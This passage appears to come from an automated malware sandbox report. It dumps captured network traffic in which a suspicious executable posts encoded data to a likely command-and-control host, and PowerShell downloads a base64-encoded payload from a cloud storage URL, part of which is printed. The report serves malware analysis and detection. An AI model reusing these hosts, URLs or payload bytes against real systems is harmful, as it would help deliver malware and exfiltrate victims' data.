                                          Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                          Oct 5, 2024 14:51:39.172629118 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                          Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                          Oct 5, 2024 14:51:39.172637939 CEST672INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                          Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                          Oct 5, 2024 14:51:39.172648907 CEST1236INData Raw: 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77
                                          Data Ascii: sync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32
                                          Oct 5, 2024 14:51:39.172660112 CEST1236INData Raw: 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 65 6d 70 74 79 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61
                                          Data Ascii: ogin</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</di
                                          Oct 5, 2024 14:51:39.172671080 CEST1236INData Raw: 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 61 72 74 69 63 6c 65 73 2f 31 35 38 33 32 31 34 2d 68 6f 77 2d 74 6f 2d 61 64 64 2d 61 2d 64 6f 6d 61 69 6e 2d 74 6f 2d 6d 79 2d 61 63 63 6f 75 6e 74 2d 68 6f 77 2d 74 6f 2d
                                          Data Ascii: upport.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change
                                          Oct 5, 2024 14:51:39.172681093 CEST1236INData Raw: 68 2e 66 6c 6f 6f 72 28 72 2f 37 30 30 29 3a 72 3e 3e 31 2c 72 2b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 65 29 2c 74 3d 30 3b 34 35 35 3c 72 3b 74 2b 3d 6f 29 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 33 35 29 3b 72 65 74 75 72 6e 20 4d 61
                                          Data Ascii: h.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c
                                          Oct 5, 2024 14:51:39.172694921 CEST1088INData Raw: 5d 3d 74 5b 64 5d 21 3d 77 5b 64 5d 3b 76 61 72 20 6d 2c 79 3d 5b 5d 3b 66 6f 72 28 68 3d 31 32 38 2c 75 3d 37 32 2c 64 3d 66 3d 30 3b 64 3c 76 3b 2b 2b 64 29 74 5b 64 5d 3c 31 32 38 26 26 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43
                                          Data Ascii: ]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.45000938.55.251.233801696C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 5, 2024 14:51:45.038877964 CEST618OUTPOST /80e1/ HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.kuaimaolife.shop
                                          Origin: http://www.kuaimaolife.shop
                                          Connection: close
                                          Cache-Control: max-age=0
                                          Content-Length: 202
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.kuaimaolife.shop/80e1/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
                                          Data Raw: 5a 70 70 78 50 3d 56 68 67 43 66 6f 4e 4e 6c 59 43 74 77 68 63 56 56 69 34 79 4d 36 68 66 38 57 50 68 6c 46 55 41 53 34 73 33 35 6b 62 35 52 51 4c 71 73 63 66 76 71 69 61 54 49 61 53 74 37 57 48 6d 35 50 48 4f 33 33 6c 37 58 76 55 67 65 77 77 72 37 4c 62 76 34 59 47 6e 39 2b 4d 54 66 61 33 56 54 35 36 69 7a 69 56 30 70 7a 65 63 77 36 65 6a 68 30 4a 65 4d 42 79 64 55 71 66 64 50 37 63 2b 74 75 64 58 45 79 41 65 32 50 47 2b 4f 72 33 57 68 67 35 57 6c 4f 2b 55 6a 4d 4e 46 54 54 47 63 50 55 4b 2f 4f 76 66 49 56 67 67 43 6b 56 37 32 36 42 4e 6d 53 64 65 61 38 33 74 4a 2b 43 4c 47 6b 67 58 4f 63 77 3d 3d
                                          Data Ascii: ZppxP=VhgCfoNNlYCtwhcVVi4yM6hf8WPhlFUAS4s35kb5RQLqscfvqiaTIaSt7WHm5PHO33l7XvUgewwr7Lbv4YGn9+MTfa3VT56iziV0pzecw6ejh0JeMBydUqfdP7c+tudXEyAe2PG+Or3Whg5WlO+UjMNFTTGcPUK/OvfIVggCkV726BNmSdea83tJ+CLGkgXOcw==
                                          Oct 5, 2024 14:51:45.818104982 CEST289INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 12:51:45 GMT
                                          Content-Type: text/html
                                          Content-Length: 146
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.45001038.55.251.233801696C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 5, 2024 14:51:47.599777937 CEST638OUTPOST /80e1/ HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.kuaimaolife.shop
                                          Origin: http://www.kuaimaolife.shop
                                          Connection: close
                                          Cache-Control: max-age=0
                                          Content-Length: 222
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.kuaimaolife.shop/80e1/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
                                          Data Raw: 5a 70 70 78 50 3d 56 68 67 43 66 6f 4e 4e 6c 59 43 74 71 42 73 56 53 44 34 79 4b 61 68 63 2f 57 50 68 75 6c 56 4c 53 35 51 33 35 67 69 6b 52 6d 62 71 76 2b 48 76 72 67 69 54 4c 61 53 74 7a 32 48 6a 33 76 47 6a 33 33 70 7a 58 71 73 67 65 78 55 72 37 4a 54 76 34 72 75 6b 2b 4f 4d 4e 4b 71 33 62 64 5a 36 69 7a 69 56 30 70 77 69 32 77 35 75 6a 67 48 52 65 4c 54 4b 61 64 4b 66 61 62 72 63 2b 67 4f 64 54 45 79 41 34 32 4c 47 59 4f 70 2f 57 68 67 4a 57 6d 64 6d 56 30 38 4e 50 4f 44 48 5a 45 46 4b 37 49 36 75 49 4c 41 30 67 6b 6e 6d 54 37 48 63 38 44 73 2f 4e 75 33 4a 36 6a 46 43 79 70 6a 71 48 48 78 63 2b 6a 50 65 39 4e 72 35 39 6c 37 31 4b 4d 66 42 32 42 54 45 3d
                                          Data Ascii: ZppxP=VhgCfoNNlYCtqBsVSD4yKahc/WPhulVLS5Q35gikRmbqv+HvrgiTLaStz2Hj3vGj33pzXqsgexUr7JTv4ruk+OMNKq3bdZ6iziV0pwi2w5ujgHReLTKadKfabrc+gOdTEyA42LGYOp/WhgJWmdmV08NPODHZEFK7I6uILA0gknmT7Hc8Ds/Nu3J6jFCypjqHHxc+jPe9Nr59l71KMfB2BTE=
                                          Oct 5, 2024 14:51:48.442344904 CEST289INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 12:51:48 GMT
                                          Content-Type: text/html
                                          Content-Length: 146
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449730162.159.140.2374431068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-05 12:49:47 UTC198OUTGET /nedkoge.mso HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
                                          Connection: Keep-Alive
                                          2024-10-05 12:49:47 UTC259INHTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 12:49:47 GMT
                                          Content-Length: 482916
                                          Connection: close
                                          Accept-Ranges: bytes
                                          ETag: "06cff17e73868fbb3a7a3c648c95a7bb"
                                          Last-Modified: Fri, 04 Oct 2024 09:22:48 GMT
                                          Server: cloudflare
                                          CF-RAY: 8cdd889f4a017285-EWR
                                          2024-10-05 12:49:47 UTC1369INData Raw: 36 77 4b 68 4f 65 73 43 41 2f 75 37 4b 31 6b 56 41 48 45 42 6d 2b 73 43 59 58 45 44 58 43 51 45 36 77 4c 45 44 58 45 42 6d 37 6e 69 59 74 75 51 36 77 4b 70 74 33 45 42 6d 34 48 42 51 79 4d 36 47 2b 73 43 33 56 70 78 41 5a 75 42 38 53 57 47 46 61 78 78 41 5a 76 72 41 6d 59 31 36 77 49 4c 42 4f 73 43 6e 63 47 36 6e 6b 74 75 32 2b 73 43 73 65 50 72 41 71 4c 63 63 51 47 62 63 51 47 62 4d 63 72 72 41 6e 4e 2f 36 77 49 4f 42 59 6b 55 43 33 45 42 6d 2b 73 43 36 6e 50 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 4f 73 43 6f 6f 42 78 41 5a 75 42 2b 5a 57 4a 78 41 56 38 7a 48 45 42 6d 33 45 42 6d 34 74 45 4a 41 54 72 41 76 54 4e 63 51 47 62 69 63 50 72 41 6d 6d 4d 63 51 47 62 67 63 4f 77 4c 6a 4d 45 36 77 4a 50 2b 48 45 42 6d 37 71 43 77 79 6b 52 63 51 47 62 36 77 4c
                                          Data Ascii: 6wKhOesCA/u7K1kVAHEBm+sCYXEDXCQE6wLEDXEBm7niYtuQ6wKpt3EBm4HBQyM6G+sC3VpxAZuB8SWGFaxxAZvrAmY16wILBOsCncG6nktu2+sCsePrAqLccQGbcQGbMcrrAnN/6wIOBYkUC3EBm+sC6nPR4nEBm3EBm4PBBOsCooBxAZuB+ZWJxAV8zHEBm3EBm4tEJATrAvTNcQGbicPrAmmMcQGbgcOwLjME6wJP+HEBm7qCwykRcQGb6wL
                                          2024-10-05 12:49:47 UTC1369INData Raw: 35 58 52 79 46 73 54 4a 75 54 51 31 33 39 32 33 73 73 58 75 41 73 69 32 78 71 55 78 46 34 6d 57 35 70 6a 77 39 66 62 6a 63 68 62 77 6f 73 68 36 70 35 6a 52 64 35 53 59 38 78 62 2f 46 6f 63 33 32 36 4b 75 4b 69 65 59 35 7a 6a 74 57 50 4d 57 36 63 6a 37 6f 6d 35 62 45 4e 42 64 47 66 4d 41 38 4c 71 57 61 65 62 59 38 7a 53 57 46 2b 47 43 61 4b 46 52 38 35 6d 59 73 78 62 38 47 49 7a 37 6c 4a 6a 7a 46 74 79 6d 79 46 66 6d 75 70 4a 61 35 74 6a 7a 44 30 66 6f 45 6d 59 58 53 66 6f 55 34 54 70 42 70 6f 65 71 55 30 76 76 6d 75 6b 53 79 63 64 54 53 2b 2b 61 30 55 39 72 4b 52 4e 4a 75 34 38 69 6c 75 61 62 45 4d 59 4a 6d 50 4d 32 75 35 48 78 4b 52 6d 49 72 52 6a 57 49 6f 38 57 35 70 6a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                          Data Ascii: 5XRyFsTJuTQ13923ssXuAsi2xqUxF4mW5pjw9fbjchbwosh6p5jRd5SY8xb/Foc326KuKieY5zjtWPMW6cj7om5bENBdGfMA8LqWaebY8zSWF+GCaKFR85mYsxb8GIz7lJjzFtymyFfmupJa5tjzD0foEmYXSfoU4TpBpoeqU0vvmukSycdTS++a0U9rKRNJu48iluabEMYJmPM2u5HxKRmIrRjWIo8W5pjAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                          2024-10-05 12:49:47 UTC1369INData Raw: 6f 35 63 34 68 43 37 35 52 7a 49 34 52 50 68 5a 4f 7a 32 36 2f 49 57 78 50 57 5a 31 71 61 59 30 57 64 6c 61 54 7a 57 4a 70 6a 7a 46 75 61 59 38 78 62 6d 6d 50 4d 57 35 70 6a 7a 46 75 61 59 38 78 62 6d 6d 50 4d 57 7a 2f 61 52 67 72 6e 58 7a 4c 42 70 71 72 2b 64 45 49 62 2f 4a 58 63 42 56 67 64 50 6a 49 59 54 33 63 31 52 2b 34 78 59 73 78 62 63 6e 52 51 57 5a 6f 4c 78 32 4c 6d 44 45 31 66 76 6d 77 4a 49 6b 6a 69 2b 48 2b 6b 36 33 4a 48 79 39 70 46 46 4c 4e 53 54 61 70 70 75 2b 32 4c 47 34 71 32 7a 5a 4b 43 6d 73 63 54 68 63 31 56 42 2b 63 64 49 6f 63 53 73 35 74 6b 42 51 64 52 6c 56 58 55 73 6e 75 2b 4b 64 68 6c 68 42 67 6f 4c 31 68 54 7a 4f 30 65 6b 75 2b 43 2b 2b 4c 52 78 51 57 68 33 32 34 39 4f 35 79 31 4c 56 35 50 77 2b 4c 49 66 30 66 71 65 50 6c 57 36
                                          Data Ascii: o5c4hC75RzI4RPhZOz26/IWxPWZ1qaY0WdlaTzWJpjzFuaY8xbmmPMW5pjzFuaY8xbmmPMWz/aRgrnXzLBpqr+dEIb/JXcBVgdPjIYT3c1R+4xYsxbcnRQWZoLx2LmDE1fvmwJIkji+H+k63JHy9pFFLNSTappu+2LG4q2zZKCmscThc1VB+cdIocSs5tkBQdRlVXUsnu+KdhlhBgoL1hTzO0eku+C++LRxQWh3249O5y1LV5Pw+LIf0fqePlW6
                                          2024-10-05 12:49:47 UTC1369INData Raw: 6e 48 6b 38 62 6b 71 6b 45 41 77 70 4e 71 6b 4c 77 34 38 6f 62 6b 6b 70 5a 49 53 4a 4e 73 73 75 71 45 2f 62 4a 2f 30 57 34 6d 32 68 52 59 31 45 53 35 48 70 4f 67 6a 78 32 59 4d 77 62 30 67 6c 7a 37 36 42 34 65 7a 57 50 4d 67 59 39 76 2b 51 4f 56 44 65 46 33 47 67 79 61 62 4f 44 45 6b 32 66 55 44 71 39 59 56 2b 34 4d 67 30 42 41 32 32 67 56 6d 4d 54 66 4a 65 73 57 31 55 63 6a 76 49 36 6e 75 47 4e 2b 49 78 33 47 34 6d 4d 45 4c 71 4f 54 61 6e 6d 42 4a 45 52 47 36 45 75 59 47 2f 70 54 62 46 43 37 62 31 62 45 33 47 6d 77 38 59 72 2f 78 6f 6f 2b 50 5a 57 6d 2f 39 4a 37 37 32 30 31 68 4c 53 74 47 6a 76 78 45 64 68 63 43 6b 45 58 38 6f 31 63 57 45 42 47 35 42 52 32 56 44 58 6d 75 55 6e 59 66 68 49 47 35 58 36 4c 4c 4c 51 54 62 57 43 70 44 50 47 47 34 30 66 55 62
                                          Data Ascii: nHk8bkqkEAwpNqkLw48obkkpZISJNssuqE/bJ/0W4m2hRY1ES5HpOgjx2YMwb0glz76B4ezWPMgY9v+QOVDeF3GgyabODEk2fUDq9YV+4Mg0BA22gVmMTfJesW1UcjvI6nuGN+Ix3G4mMELqOTanmBJERG6EuYG/pTbFC7b1bE3Gmw8Yr/xoo+PZWm/9J77201hLStGjvxEdhcCkEX8o1cWEBG5BR2VDXmuUnYfhIG5X6LLLQTbWCpDPGG40fUb
                                          2024-10-05 12:49:47 UTC1369INData Raw: 4e 43 4f 70 76 43 39 6a 67 68 6f 41 62 37 6b 79 4c 62 44 5a 69 38 55 57 57 54 4c 44 6c 5a 57 37 44 64 77 50 64 34 6f 63 53 74 70 30 55 69 45 4e 35 36 46 37 53 52 71 78 4d 50 6b 52 39 72 52 5a 6d 6d 4d 41 6d 51 36 72 68 6a 7a 7a 77 51 4b 38 51 37 31 77 56 6f 6e 77 33 58 38 37 78 5a 43 6d 63 30 49 59 4e 54 65 7a 62 44 73 45 6c 74 6a 52 55 4b 4b 39 74 65 58 4a 43 36 35 5a 34 71 6f 49 38 6f 79 6b 34 55 78 36 6a 44 50 70 31 4c 30 44 47 31 66 6f 68 54 6b 4c 39 74 71 65 52 30 74 62 63 37 69 63 34 30 71 4f 46 45 61 76 34 4c 48 59 45 47 5a 68 4b 7a 34 4c 6d 73 63 54 68 63 31 64 42 77 58 31 6f 65 6c 44 6d 4f 4a 6e 6c 6d 44 31 59 45 30 68 6e 34 44 55 37 6f 4c 62 53 68 49 63 5a 33 45 61 32 4b 59 41 34 48 45 6d 50 61 31 6f 73 65 6a 47 33 66 44 5a 36 2b 36 57 6c 4f 72
                                          Data Ascii: NCOpvC9jghoAb7kyLbDZi8UWWTLDlZW7DdwPd4ocStp0UiEN56F7SRqxMPkR9rRZmmMAmQ6rhjzzwQK8Q71wVonw3X87xZCmc0IYNTezbDsEltjRUKK9teXJC65Z4qoI8oyk4Ux6jDPp1L0DG1fohTkL9tqeR0tbc7ic40qOFEav4LHYEGZhKz4LmscThc1dBwX1oelDmOJnlmD1YE0hn4DU7oLbShIcZ3Ea2KYA4HEmPa1osejG3fDZ6+6WlOr
                                          2024-10-05 12:49:47 UTC1369INData Raw: 4c 47 6b 2f 32 50 6d 4a 39 37 35 31 77 68 2b 71 74 70 67 34 33 73 45 48 71 6d 58 62 6d 53 55 31 43 71 76 6e 76 77 34 4f 44 42 33 37 6c 44 57 78 74 70 78 50 68 4e 6e 75 65 49 6e 6b 67 48 54 4d 4e 70 78 68 6c 2b 63 63 4f 72 2f 53 58 58 34 63 2f 55 52 55 69 74 56 55 4f 77 35 74 61 68 52 55 79 45 39 4b 6e 44 73 37 6b 30 51 2f 68 48 64 54 71 72 34 4c 36 46 4a 75 6d 34 2b 68 47 6e 79 73 74 65 37 70 4e 63 41 79 6a 4a 31 4a 54 33 6c 59 39 70 72 2f 66 52 6f 4b 65 49 4e 4c 76 41 70 4c 39 4b 62 56 66 56 53 56 2b 32 65 58 62 58 31 6a 4a 4b 53 47 2b 57 2b 68 4c 79 54 47 6e 67 41 6f 34 6a 72 44 54 76 69 72 75 56 4f 2b 34 35 77 6d 61 73 2f 4e 2f 71 30 77 2b 68 4a 32 35 74 6a 7a 41 6b 67 32 68 77 6d 45 2b 49 2b 4e 7a 4b 74 6f 39 70 6f 74 72 58 6f 66 44 4e 51 30 6e 70 71
                                          Data Ascii: LGk/2PmJ9751wh+qtpg43sEHqmXbmSU1Cqvnvw4ODB37lDWxtpxPhNnueInkgHTMNpxhl+ccOr/SXX4c/URUitVUOw5tahRUyE9KnDs7k0Q/hHdTqr4L6FJum4+hGnyste7pNcAyjJ1JT3lY9pr/fRoKeINLvApL9KbVfVSV+2eXbX1jJKSG+W+hLyTGngAo4jrDTviruVO+45wmas/N/q0w+hJ25tjzAkg2hwmE+I+NzKto9potrXofDNQ0npq
                                          2024-10-05 12:49:47 UTC1369INData Raw: 4e 71 62 4b 38 69 73 66 56 4b 6a 2f 66 57 48 64 79 63 2f 53 7a 44 34 71 4e 58 34 4d 73 51 49 64 6a 6d 58 6e 49 73 57 46 2b 61 62 4d 31 6f 6b 57 50 4d 57 35 70 6a 7a 46 75 61 59 38 78 62 6d 6d 50 4d 57 35 70 6a 7a 46 75 61 59 38 78 62 6d 74 36 44 70 67 42 62 4b 57 47 47 30 68 78 6f 34 73 59 45 64 49 2b 61 4d 2b 37 57 59 73 78 62 63 76 63 6f 58 35 71 76 2f 32 72 58 76 56 54 47 67 57 62 73 62 32 41 34 36 56 68 56 37 68 31 72 49 55 4f 79 67 78 4d 33 4c 75 62 39 31 6b 38 79 45 54 68 2f 45 72 6a 75 52 5a 78 64 35 70 78 5a 6d 6d 50 64 53 6f 65 64 6e 2b 43 47 6f 42 34 68 47 35 43 73 7a 49 41 76 54 62 42 67 44 41 74 74 45 31 68 4a 56 72 4e 45 6b 47 49 34 48 34 6c 4f 54 71 42 42 50 7a 2b 4d 54 65 2b 64 47 70 35 51 75 7a 47 68 36 79 41 4f 76 4b 4a 66 79 75 39 68 4e
                                          Data Ascii: NqbK8isfVKj/fWHdyc/SzD4qNX4MsQIdjmXnIsWF+abM1okWPMW5pjzFuaY8xbmmPMW5pjzFuaY8xbmt6DpgBbKWGG0hxo4sYEdI+aM+7WYsxbcvcoX5qv/2rXvVTGgWbsb2A46VhV7h1rIUOygxM3Lub91k8yETh/ErjuRZxd5pxZmmPdSoedn+CGoB4hG5CszIAvTbBgDAttE1hJVrNEkGI4H4lOTqBBPz+MTe+dGp5QuzGh6yAOvKJfyu9hN
                                          2024-10-05 12:49:47 UTC1369INData Raw: 46 34 72 45 6e 4b 50 33 4d 57 35 58 75 69 4e 57 61 59 35 58 61 62 4e 53 59 2b 31 73 31 52 2b 37 63 59 63 78 62 79 4e 6b 71 46 51 56 48 54 62 48 41 48 4b 32 74 47 35 46 41 6c 61 64 4e 6e 4d 63 54 67 38 31 4c 42 77 58 31 71 2b 35 70 78 73 54 73 38 41 41 43 6e 39 48 36 4c 41 59 6f 62 68 33 50 2f 63 2f 50 52 4d 79 6f 5a 68 37 6e 5a 68 73 69 42 79 75 42 78 57 4b 33 4e 5a 35 31 50 5a 69 69 73 35 51 39 48 36 6d 57 30 67 63 4b 7a 6c 75 61 36 6a 63 49 79 39 70 4b 46 32 6e 41 54 62 49 71 76 7a 69 6d 47 35 49 61 4e 57 54 47 6e 4d 63 54 67 38 56 54 42 77 58 31 6e 4f 6c 35 2f 6f 4b 76 70 45 46 62 6f 76 45 4b 4a 59 74 69 79 57 2f 42 79 46 5a 32 49 61 2b 6e 61 4a 33 46 36 6d 77 35 4b 36 53 61 31 61 54 74 4f 4b 37 6c 4d 72 46 5a 6f 4a 4a 51 34 66 74 59 77 4b 4b 34 68 39
                                          Data Ascii: F4rEnKP3MW5XuiNWaY5XabNSY+1s1R+7cYcxbyNkqFQVHTbHAHK2tG5FAladNnMcTg81LBwX1q+5pxsTs8AACn9H6LAYobh3P/c/PRMyoZh7nZhsiByuBxWK3NZ51PZiis5Q9H6mW0gcKzlua6jcIy9pKF2nATbIqvzimG5IaNWTGnMcTg8VTBwX1nOl5/oKvpEFbovEKJYtiyW/ByFZ2Ia+naJ3F6mw5K6Sa1aTtOK7lMrFZoJJQ4ftYwKK4h9
                                          2024-10-05 12:49:47 UTC1369INData Raw: 6e 77 58 73 44 59 6e 62 4e 51 78 42 36 38 4e 34 35 4c 75 71 4a 47 46 49 5a 38 7a 51 33 57 64 46 33 76 5a 69 7a 46 73 54 31 6e 74 61 6d 6d 50 44 57 30 54 63 7a 46 75 61 59 38 78 62 6d 6d 50 4d 57 35 70 6a 7a 46 75 61 59 38 78 62 6d 6d 50 4d 57 35 70 6a 63 64 4e 70 4f 62 49 72 52 66 31 6d 34 32 64 45 47 4f 73 59 43 59 6a 6c 55 48 62 34 33 42 75 6c 68 72 4f 38 54 35 76 6b 38 43 77 58 77 52 75 4d 7a 46 47 2b 70 45 32 73 56 66 62 66 7a 78 75 55 6f 4f 46 45 4f 55 32 30 4e 54 79 32 52 68 4e 38 50 54 69 57 4d 2b 2f 2f 55 5a 38 56 75 4c 50 6a 58 73 4f 69 33 38 7a 36 73 45 41 77 53 30 6e 73 51 2b 49 72 31 4f 4a 56 74 6a 78 4e 72 54 33 42 4c 4f 45 62 6a 58 38 48 49 47 71 61 30 43 2f 55 7a 56 75 61 36 6b 6d 51 6d 32 50 4d 56 4a 71 35 62 31 75 61 59 38 78 62 6d 6d 50
                                          Data Ascii: nwXsDYnbNQxB68N45LuqJGFIZ8zQ3WdF3vZizFsT1ntammPDW0TczFuaY8xbmmPMW5pjzFuaY8xbmmPMW5pjcdNpObIrRf1m42dEGOsYCYjlUHb43BulhrO8T5vk8CwXwRuMzFG+pE2sVfbfzxuUoOFEOU20NTy2RhN8PTiWM+//UZ8VuLPjXsOi38z6sEAwS0nsQ+Ir1OJVtjxNrT3BLOEbjX8HIGqa0C/UzVua6kmQm2PMVJq5b1uaY8xbmmP
                                          2024-10-05 12:49:47 UTC1369INData Raw: 33 6c 31 38 32 6a 38 78 76 68 51 75 54 30 66 6f 70 4a 6a 53 54 6d 62 35 49 51 64 67 6d 73 62 6c 4a 57 5a 34 51 64 4e 72 4f 52 45 48 62 38 62 70 44 67 31 6d 46 4a 4e 72 4c 64 6f 4b 37 72 4b 2f 30 57 37 6d 31 74 52 50 61 4f 39 73 56 4d 48 64 67 71 32 45 63 67 4f 31 61 7a 42 32 30 66 57 71 33 65 52 30 52 52 71 36 51 31 59 42 30 2f 35 42 6d 36 70 31 57 64 52 51 2b 66 4d 48 64 31 6b 6f 59 78 38 7a 2b 72 44 33 48 6c 36 63 58 4c 4a 32 4e 4d 4f 41 30 56 4e 6f 43 78 6a 7a 46 75 56 35 77 4f 57 6e 6d 4f 58 41 78 2b 72 6b 39 44 64 62 30 58 65 36 6d 4c 4d 57 31 61 4a 7a 79 75 4e 48 78 47 4b 75 44 6c 75 32 66 50 67 47 48 36 46 63 32 43 63 4b 35 33 38 78 35 6e 45 44 78 77 6d 46 6b 78 57 42 6f 77 32 52 61 69 73 73 6e 58 6c 71 79 56 36 79 64 6a 54 5a 4c 6d 5a 54 5a 69 79
